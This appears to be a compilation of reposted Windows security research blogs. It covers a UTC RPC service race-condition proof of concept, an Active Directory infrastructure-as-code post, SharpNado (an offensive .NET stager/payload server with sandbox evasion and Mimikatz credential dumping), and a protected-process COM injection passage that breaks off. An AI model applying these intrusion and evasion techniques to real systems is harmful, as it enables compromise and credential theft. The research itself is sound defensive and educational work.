0c2fe72c 66891dca Helper!DllGetActivationFactory+0x9a53
0c2fe730 0e8be030
0c2fe734 1881a45e // Scenario ID
0c2fe738 445201fd
0c2fe73c 234ae4ac
0c2fe740 e3666e66
0c2fe744 00000000
0c2fe748 032ae620 // Escalation path
0:027> du 032ae620
032ae620 "E:\researcher\Documents\Feedback"
032ae660 "Hub\{e04b7a09-02bd-42e8-a5a8-666"
032ae6a0 "b5102f5de}\{e04b7a09-02bd-42e8-a"
032ae6e0 "5a8-666b5102f5de}"


As a result, the prototype of UtcApi_EscalateScenarioAsync looks like the following:

long UtcApi_EscalateScenarioAsync (
[in] GUID SecnarioID, 
[in] int16 unknown, 
[in] wchar_t* wszEscalationPath
[in] long unknown2, 
[in] long unknown3, 
[in] long num_of_keyval_pairs, 
[in] wchar_t **keys, 
[in] wchar_t **values) 


Putting all of this together, our proof of concept (PoC) flows like this:

  • Create an infinite thread that will monitor our target directory, eg: C:\WINDOWS\SYSTEM32, in order to capture the folder name of diagtracktempdir
  • Create another infinite thread that will create an exclusive file handle into C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z
  • Call UtcApi_EscalateScenarioAsync(1881A45E-01FD-4452-ACE4-4A23666E66E3) to trigger Microsoft::Diagnostic::EscalationWorkItem::Execute
  • C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z will have been created successfully if we have won the race
  • After that, the attacker can write and execute arbitrary files to the escalated folder C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal} to bypass legitimate programs that have always assumed that %SYSTEM32% directory contains only legitimate OS files

The result of our PoC demonstrates the potential ways to create arbitrary files and folders in a static folder under a restricted directory by leveraging the UTC service.

Fortinet FortiGuard Labs Threat Research

Figure 8: PoC allowed creating arbitrary files in diagtracktempdir

To reiterate, this PoC does not pose a security risk to Windows OS without also being able to control or rename the folder diagtracktempdir, as stated by the MSRC. However, it is common to see malware authors utilizing different techniques such as User Account Control (UAC) bypass in order to write files to a Windows system folder with the intention of bypassing a delicate heuristic detector. In fact, while exploring the potential file paths to be used in the PoC, we found that C:\WINDOWS\SYSTEM32\Tasks contains write and execute permissions for normal user accounts. but without read permission—which is why this folder is also one of the notorious target paths for malware authors to store malicious files.


In this first part of the blog series, we have shown you our approach to finding a potential security risk in a Windows RPC Server using different available tools and online resources. We also demonstrated some of the fundamental knowledge you need to reverse-engineer an RPC Server. We strongly believe there are still other potential security risks in the RPC Server. As a result, we are determined to harden Windows RPC Servers further. In the second part of this blog series, we will continue our investigation and improve our methodology that will lead us to uncover other RPC Server vulnerabilities.

Active Directory as Code

( Original text by Palantir )

Windows Automation used to be hard, or at least not straightforward, manifesting itself in right-click-to-glory deployments where API-based management was a second thought. But the times, they are a-changin’! With the rise of DevOps, the release of Windows Server 2016, and the growth of the PowerShell ecosystemopportunities to redesign traditional Windows infrastructure have opened up.

One of the more prevalent Windows-based systems is Active Directory (AD) — a cornerstone in most enterprise environments which, for many, has remained an on-premise installation. At Palantir, we ❤️ Infrastructure as Code (see Terraforming Stackoverflow and Bouncer), so when we were tasked with deploying an isolated, highly available, and secure AD infrastructure in AWS, we started to explore ways we can apply Infrastructure as Code (IaC) practices to AD. The goal was to make AD deployments automated, repeatable, and configured by code. Additionally, we wanted any updates tied to patch and configuration management integrated with our CI/CD pipeline.

This post walks through the approach we took to solve the problem by outlining the deployment process including building AD AMIs using Packer, configuring the AD infrastructure using Terraform, and storing configuration secrets in Vault.

Packerizing Active Directory

Our approach to Infrastructure as Code involves managing configuration by updating and deploying layered, immutable images. In our experience, this reduces entropy, codifies configuration, and is more aligned with CI/CD workflows which allows for faster iteration.

Our AD image is a downstream layer on top of our standard Windows image built using a custom pipeline using Packer, Jenkins and AWS CodeBuild. The base image includes custom Desired State Configuration (DSC) modules which manage various components of Windows, Auto Scaling Group (ASG) lifecycle hooks, and most importantly, security tooling. By performing this configuration through the base image, we can enforce security and best practices regardless of how the image is consumed.

Creating a standardized AD image

The AD image can be broken down into the logical components of an instance lifecycle: initial image creation, instance bootstrapping, and decommissioning.

Image creation

It is usually best practice to front-load as much of the logic during the initial build since this process only happens once whereas bootstrapping will run for each instance. This is less relevant when it comes to AD images which tend be lightweight with minimal package dependencies.

Desired State Configuration (DSC) modules

AD configuration has traditionally been a very GUI-driven workflow that has been quite difficult to automate. In recent years, PowerShell has become a robust option for increasing engineer productivity, but managing configuration drift has always been a challenge. Cue DSC modules 🎉

DSC modules are a great way to configure and keep configured the Windows environment with minimal user interaction. DSC configuration is run at regular intervals on the host and can be used to not only report drift, but to reinforce the desired state (similar to third-party configuration tools). 

One of these modules is the Microsoft AD DSC module. To illustrate how DSC can be a force multiplier, here is a quick example of a group creation invocation. This might seem heavy-handed for a single group, but the real benefit is when you are able to iterate over a list of groups such as below for the same amount of effort. The initial content of Groups can be specified in a Packer build (static CSV) or generated dynamically from an external look-up.

Sample DSC configuration

Example demonstrating ingesting a list of N AD groups
and creating their respective resources using a single code
        The AD groups can be baked in the AMI or retrieved from an
external source

$ConfigData = @{
AllNodes = @(
NodeName = '*'
Groups = (Get-Content "C:\dsc\groups.csv")

Configuration NodeConfiguration
Import-DSCResource -ModuleName xActiveDirectory

Node $AllNodes.NodeName {
foreach ($group in $node.Groups) {
xADGroup $group
GroupName = $group
Ensure = "Present"
# additional params

NodeConfiguration -ConfigurationData $ConfigData

We have taken this one step further by building additional modules to stand up a cluster from scratch. These modules handle everything from configuring core Windows features to deploying a new domain controller. By implementing these tasks as modules, we get the inherent DSC benefits for free, for instance reboot resilience and mitigation of configuration drift.

Bootstrap scripts

Secrets. A problem like handling configuration secrets like static credentials warrants additional consideration when it comes to a sensitive environment such as AD. Storing encrypted secrets on disk, manually entering them at bootstrap time, or a combination of the two are all sub-optimal solutions. We were looking for a solution that will:

  • Be API-driven so that we can plug it in to our automation
  • Address the secure introduction problem so that only trusted instances are able to gain access
  • Enforce role-based access control to ensure separation between the Administrators (who create the secrets) and instances (that consume the secrets)
  • Enforce a configurable access window during which the instances are able to access the required secrets

Based on the above criteria, we have settled on using Vault to store our secrets for most of our automated processes. We have furthered enhanced it by creating an ecosystem which automates the management of roles and policies, allowing us to grow at scale while minimizing administrative overhead. This allows us to easily permission secrets and control what has access to them and how long by integrating Vault with AWS’ IAM service. This along with proper auditing and controls gives us the best of both worlds: automation and secure secrets management.

Below is an example of how an EC2 instance might retrieve a token from a Vault cluster and use that token to retrieve secrets:

Configuring the instance. AWS ASGs automatically execute the user data (usually a PowerShell script) that is specified in their launch configuration. We also have the option to dynamically pass variables into the script to configure the instance at launch time. As an example, here we are setting the short and full domain names and specifying the Vault endpoint by passing them as arguments for bootstrap.ps1:

Terraform invocation

data "template_file" "userdata" {
template = "${file("${path.module}/bootstrap/bootstrap.ps1")}"

vars {
domain = "${var.domain_name}"
shortname = "${var.domain_short_name}"
vaultaddress = "${var.vault_addr}"
resource "aws_auto_scaling_group" "my_asg" {
# ...
user_data = "${data.template_file.userdata.rendered}"

Bootstrap script (bootstrap.ps1)

Write-Host "My domain name is ${domain} (${shortname})"
Write-Host "I get secrets from ${vaultaddress}"
# ... continue configuration

In addition to ensuring that the logic is correct for configuring your instance, something else that is as equally important is validation to reduce false positives when putting an instance in service. AWS provides a tool for doing this called lifecycle hooks. Since lifecycle hook completions are called manually in a bootstrap script, the script can contain additional logic for validating settings and services before declaring the instance in-service.

Instance clean-up

The final part of the lifecycle that needs to be addressed is instance decommissioning. Launching instances in the cloud gives us tremendous flexibility, but we also need to be prepared for the inevitable failure of a node or user-initiated replacement. When this happens, we attempt to terminate the instance as gracefully as possible. For example, we may need to transfer the Flexible Single-Master Operation (FSMO) role and clean up DNS entries.

We chose to implement lifecycle hooks using a simple scheduled task to check the instance’s state in the ASG. When the state has been set to Terminating:Wait, we run the cleanup logic and complete the terminate hook explicitly. We know that lifecycle hooks are not guaranteed to complete or fire (e.g., when instances experience hardware failure) so if consistency is a requirement for you, you should look into implementing an external cleanup service or additional logic within bootstrapping.

Putting it all together: Terraforming Active Directory

Bootstrapping infrastructure

With our Packer configuration now complete, it is time to use Terraform to configure our AD infrastructure and deploy AMIs. We implemented this by creating and invoking a Terraform module that automagically bootstraps our new forest. Bootstrapping a new forest involves deploying a primary Domain Controller (DC) to serve as the FSMO role holder, and then updating the VPC’s DHCP Options Set so that instances can resolve AD DNS. 

The design pattern that we chose to automate the bootstrapping of the AD forest was to divide the process into two distinct states and switch between them by simply updating the required variables (lifecycle, configure_dhcp_os) in our Terraform module and applying it.

Let us take a look at the module invocation in the two states starting with the Bootstrap State where we deploy our primary DC to the VPC:

# Bootstrap Forest
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = [""]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = ""
    need_fsmo   = "true"
    # Add me for step 1 and swap me out for step 2
lifecycle = "bootstrap"

# Set me to true when lifecyle = "steady"
configure_dhcp_os = "false"

Once the Bootstrap State is complete, we switch to the Steady State where we deploy our second DC and update the DHCP Options Set. The module invocation is exactly the same except for the changes made to the lifecycleand configure_dhcp_os variables:

# Apply Steady State
module "ad" {
source = "git@private-github:ad/terraform.git"
    env      = "staging"
mod_name = "MyADForest"
    key_pair_name = "myawesomekeypair"
vpc_id = "vpc-12345"
subnet_ids = ["subnet-54321", "subnet-64533"]
    trusted_cidrs = [""]
need_trusted_cidrs = "true"
    domain_name       = "ad.forest"
domain_short_name = "ad"
base_fqdn = "DC=ad,DC=forest"
vault_addr = ""
    need_fsmo   = "true"

# Add me for step 1 and swap me out for step 2
lifecycle = "steady"
    # Set me to true when lifecyle = "steady"
configure_dhcp_os = "true"

Using this design pattern, we were able to automate the entire deployment process and manually transition between the two states as needed. Relevant resources are conditionally provisioned during the two states by making use of the count primitive and interpolation functions in Terraform.

Managing steady state

Once our AD infrastructure is in a Steady state, we update the configuration and apply patches by replacing our instances with updated AMIs using Bouncer. We run Bouncer in serial mode to gracefully decommission a DC and replace it by bringing up a DC with a new image as outlined in the “Instance Clean Up” section above. Once the first DC has been replaced, Bouncer will proceed to cycle the next DC.


Using the above approach we were able to create an isolated, highly-available AD environment and manage it entirely using code. It made the secure thing to do the easy thing to do because we are able to use Git-based workflows, with 2-FA, to gate and approve changes as all of the configuration exists in source control. Furthermore, we have found that this approach of tying our patch management process to our CI/CD pipeline has led to much faster patch compliance due to reduced friction.

In addition to the security wins, we have also improved the operational experience by mitigating configuration drift and being able to rely on code as a source for documentation. It also helps that our disaster recovery strategy for this forest amounts to redeploying the code in a different region. Additionally, benefits like change tracking and peer reviews that have normally been reserved for software development are now also applied to our AD ops processes.

SharpNado — Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads

( Original text by Shawn Jones )


I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was on accident and I will gladly make any updates if needed.  This is intended for educational purposes only.


SharpNado is proof of concept tool that demonstrates how one could use .Net Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a full functioning, robust, payload delivery system nor is it anything groundbreaking. It’s merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let’s just say one of its use cases is it allows two applications living on different systems to share information back and forth with each other. You can read more about them here:


.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, it allows us to build in logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can still stay small and flexible but we can also build in complex rules server side that allow us to change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic, if domain user equals X fire and if not don’t.  While this doesn’t seem very climatic, you could easily build in more complex rules.  For example, if the domain user equals X,  the internal domain is correct and user X has administrative rights, run payload Y or if user X is a standard user, and the internal domain is correct, run payload Z.  Adding to this, we could say if user X is correct, but the internal domain is a mismatch, send back the correct internal domain and let me choose if I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let’s talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable or often they use a staged approach where the non-malicious stager reaches out to the web, retrieves our malicious code and executes it as long as environmental variables align.  The above examples are fine and still work well even today and I am in no way tearing these down at all or saying better ways don’t exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch between what the stager will execute.  We can do this either by back-end server logic as discussed above or by quickly setting different payloads within the SharpNado console.  So, let’s say our first payload gets blocked by endpoint protection. Since we already know our stager did try to execute our first payload due to the way the stager/server communicate we can use our deductive reason skills to conclude that our stager is good but the malicious code it tried to execute got caught. We can quickly, in the console, switch our payload to our super stealthy payload and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload which got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that I could do all this with mod rewrite rules and while that is absolutely true, mod rewrite rules can be a little more complex and time consuming to setup.  This is not meant to replace mod rewrite or anything.  Long live mod rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow easier to follow rules, modularization, and data parsing/presentation.

4. Payloads aren’t directly exposed:

What do I mean by this?  You can’t just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute along with any complex logic we want to run sits behind our remote server interface.  That remote interface exposes only the remote server side methods which can then be called by your stager. Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works.  As there are many people who explain it and understand it better than I ever will.

Keep in mind, that you would still want to encrypt all of your payloads before they are sent over the wire to better protect your payloads.  You would also want to use other evasion techniques, for example, amount of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around awhile:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.

Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz logonpasswords function.  First, we will setup our XML payload template that the server will be able to use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already setup that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload setup, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and setup our listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080.  So, our stager should be setup to connect to  I would like to note two things here.  First is that with a little bit of work upfront server side, this could be modified to support HTTPS and secondly, SharpNado does not depend on the templates being setup prior to running.  You can add/delete/modify templates any time while the server is running using whatever text editor you would like.

Now let’s see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.

In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command «show payloads» and if your payloads show up, you know you set it correctly.

Lastly, we will setup our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe but this could be delivered via .NetToJavaScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the «run» command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure again, that everything is setup correctly.

Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.

Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1 and when we run the same exact stager again, we instead will show our ipconfig information.  Again, this is only for simple demonstration of how you can quickly change out payloads.

Simple sandbox evade example:

In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from or previous example, all we need to do is set our payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don’t hit our correct target.

Looking at our simple stager example below we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service or a 0 will be sent if the user isn’t anthem.  Please keep in mind you could however send back any information you like, including username, domain, etc.

Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and depending on threshold kill the service.  This would be an example of building in counter measures if we think we are being analyzed and/or sand-boxed.

Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.

Now if I change the user to anthem2 and go through the process again.  We can see that our non-malicious payload fires.  Keep in mind, the stagers could be setup in a way that values aren’t hard coded in.  You could have a list of users on your server and have your stager loop through that list and if anything matches, execute and if not do something else.  Again, it’s really up to your imagination.

Compile source code on the fly example:

Let’s do one more quick example but using C# source code.  This stager method will use System.CodeDom.Compiler which does shortly drop stuff to disk right before executing in memory but one could create a stager that takes advantage of the open source C# and VB compiler Roslyn to do the same thing.  This doesn’t touch disk as pointed out by @cobbr_io in his SharpShell blog post.

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:

Then we will setup our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.

Now when we run our stager, we should see our ipconfig output.


Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado —

SharpNado Compiled Binaries —

SharpSploitConsole —

SharpSploit —

Injecting Code into Windows Protected Processes using COM — Part 2

( Original text by James Forshaw )

In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts link for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.

PathSigning Level

As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level though hijacking a COM object load in WerFaultSecure. Even thoughWerFaultSecure didn’t expose a service if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaledObject Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’sIObjectExporter RPC interface. The prototype of ResolveOxid is as follows:interface IObjectExporter {  // …  error_status_t ResolveOxid([in] handle_t hRpc,[in] OXID* pOxid,[in] unsigned short cRequestedProtseqs,[in] unsigned short arRequestedProtseqs[],[out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,[out, ref] IPID* pipidRemUnknown,[out, ref] DWORD* pAuthnHint);In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRefand RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundationinterface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNamesand ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of theIRundown interface. After cleanup the IRundown interface looks like the following:[uuid(«00000134-0000-0000-c000-000000000046»)]interface IRundown : IUnknown {   HRESULT RemQueryInterface(…);   HRESULT RemAddRef(…);   HRESULT RemRelease(…);   HRESULT RemQueryInterface2(…);   HRESULT RemChangeRef(…);   HRESULT DoCallback([in] struct XAptCallback* pCallbackData);   HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);   HRESULT AcknowledgeMarshalingSets(…);   HRESULT GetInterfaceNameFromIPID(…);   HRESULT RundownOid(…);}This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallbackand DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):struct XAptCallback { void* pfnCallback; void* pParam; void* pServerCtx; void* pUnk; void* iid; int   iMethod; GUID  guidProcessSecret;};HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData){ CProcessSecret::GetProcessSecret(&pguidProcessSecret);if(!memcmp(&pguidProcessSecret,&pCallbackData->guidProcessSecret,sizeof(GUID))){if(pCallbackData->pServerCtx == GetCurrentContext()){return pCallbackData->pfnCallback(pCallbackData->pParam);}else{return SwitchForCallback(                  pCallbackData->pServerCtx,                  pCallbackData->pfnCallback,                  pCallbackData->pParam);}}return E_INVALIDARG;}This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent theDoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking theDoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:

  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version ofWerFaultSecure.Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:

  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

